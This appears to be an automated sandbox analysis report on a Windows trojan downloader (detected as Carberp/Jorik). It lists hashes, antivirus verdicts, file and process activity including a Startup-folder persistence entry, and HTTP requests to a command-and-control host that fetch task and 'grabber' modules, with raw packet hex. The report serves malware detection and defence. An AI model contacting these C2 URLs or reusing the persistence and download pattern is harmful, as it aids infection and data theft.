Analysis Date2015-06-09 17:34:12
MD5820906bcee09e54893fc90ce421810b8
SHA1106759d5361e2a8036f6ee40f2a6ab04c86f0f0d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 405b642aea4d0e7eb5bc5a050ce42ca3 sha1: 23fac59baecd4c79e7c8b0d5739839444909ea3a size: 1024
SectionBSS md5: 99994d17f8e8c9dd30c67ee547e44b84 sha1: b91f6a31cf4f3041966d972c4da8fe40592ebd76 size: 6144
Section.ndata md5: bba1549b3ded5ea75164c5c03d26e822 sha1: b377751b73f2ebb445d4103ad60c817e5221bdf4 size: 512
Section.rdata md5: 2e4e8bb8854d1de9acee3d219e885f1b sha1: dca4526e3ce7def95be4c04e84fee6f8fbbc1889 size: 512
Section.reloc md5: 9175d9b2be780182e881d91427ca9cb0 sha1: 5be43438ed9dba0846d31dad9537fc57a4d89831 size: 512
Section.rsrc md5: 6a0b3b7e964f86bf028d38b65389ab57 sha1: de93eaedc5bd73484ab46456f51dbe6dc6027d9f size: 14848
Timestamp1997-08-01 17:24:02
PEhash56776ab9ea1d16d3036c2be16615a3ac296a9124
IMPhash2e32a1a1c58ecf7b0cbe186bdf09806c
AVRisingTrojan.Win32.Generic.14579927
AVMcafeeno_virus
AVAvira (antivir)TR/Dropper.Gen
AVTwisterTrojan.8781EE51B161B357
AVAd-AwareGen:Heur.IPZ.6
AVAlwil (avast)MalOb-BI [Cryp]
AVEset (nod32)Win32/Kryptik.FVY
AVGrisoft (avg)Generic18.BYBJ
AVSymantecTrojan.ADH
AVFortinetW32/Jorik_Suslik.B!tr
AVBitDefenderGen:Heur.IPZ.6
AVK7no_virus
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Carberp.A
AVMicroWorld (escan)Gen:Heur.IPZ.6
AVMalwareBytesno_virus
AVAuthentiumno_virus
AVFrisk (f-prot)no_virus
AVIkarusTrojan-Ransom.Win32.PinkBlocker
AVEmsisoftGen:Heur.IPZ.6
AVZillya!Trojan.Jorik.Win32.1116
AVKasperskyno_virus
AVTrend Microno_virus
AVCAT (quickheal)Trojan.Jorik.Carberp.e.cw6
AVVirusBlokAda (vba32)BScope.Trojan.Dropper
AVPadvishno_virus
AVBullGuardGen:Heur.IPZ.6
AVArcabit (arcavir)Gen:Heur.IPZ.6
AVClamAVWin.Trojan.Agent-629480
AVDr. WebTrojan.Packed.1530
AVF-SecureGen:Heur.IPZ.6
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\syscron.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Deletes FileC:\malware.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Creates ProcessC:\WINDOWS\system32\svchost.exe -k netsvcs
Creates ProcessC:\WINDOWS\system32\svchost.exe -k netsvcs

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\10.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\D.tmp
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\usernt.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\D.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSyandexsecurity.com

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Winsock DNSyandexsecurity.com

Network Details:

DNSyandexsecurity.com
Type: A
141.8.225.80
DNSyandexsecurity.com
Type: A
141.8.225.80
HTTP GEThttp://yandexsecurity.com/task.php?id=HEXOR09F2F48419E66A986C91571E13C2E0452&task=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
HTTP GEThttp://yandexsecurity.com/micfile.pcp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://yandexsecurity.com/grabber.pcp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f746173 6b2e7068 703f6964   GET /task.php?id
0x00000010 (00016)   3d484558 4f523039 46324634 38343139   =HEXOR09F2F48419
0x00000020 (00032)   45363641 39383643 39313537 31453133   E66A986C91571E13
0x00000030 (00048)   43324530 34353226 7461736b 3d302048   C2E0452&task=0 H
0x00000040 (00064)   5454502f 312e300d 0a486f73 743a2079   TTP/1.0..Host: y
0x00000050 (00080)   616e6465 78736563 75726974 792e636f   andexsecurity.co
0x00000060 (00096)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f35 2e302028 57696e64   ozilla/5.0 (Wind
0x00000080 (00128)   6f77733b 20553b20 57696e64 6f777320   ows; U; Windows 
0x00000090 (00144)   4e542035 2e313b20 72753b20 72763a31   NT 5.1; ru; rv:1
0x000000a0 (00160)   2e392e31 2e342920 4765636b 6f2f3230   .9.1.4) Gecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....

0x00000000 (00000)   47455420 2f6d6963 66696c65 2e706370   GET /micfile.pcp
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000030 (00048)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000040 (00064)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000050 (00080)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000060 (00096)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000070 (00112)   37290d0a 486f7374 3a207961 6e646578   7)..Host: yandex
0x00000080 (00128)   73656375 72697479 2e636f6d 0d0a4361   security.com..Ca
0x00000090 (00144)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000a0 (00160)   63616368 650d0a0d 0a65636b 6f2f3230   cache....ecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....

0x00000000 (00000)   47455420 2f677261 62626572 2e706370   GET /grabber.pcp
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000030 (00048)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000040 (00064)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000050 (00080)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000060 (00096)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000070 (00112)   37290d0a 486f7374 3a207961 6e646578   7)..Host: yandex
0x00000080 (00128)   73656375 72697479 2e636f6d 0d0a4361   security.com..Ca
0x00000090 (00144)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000a0 (00160)   63616368 650d0a0d 0a65636b 6f2f3230   cache....ecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....


Strings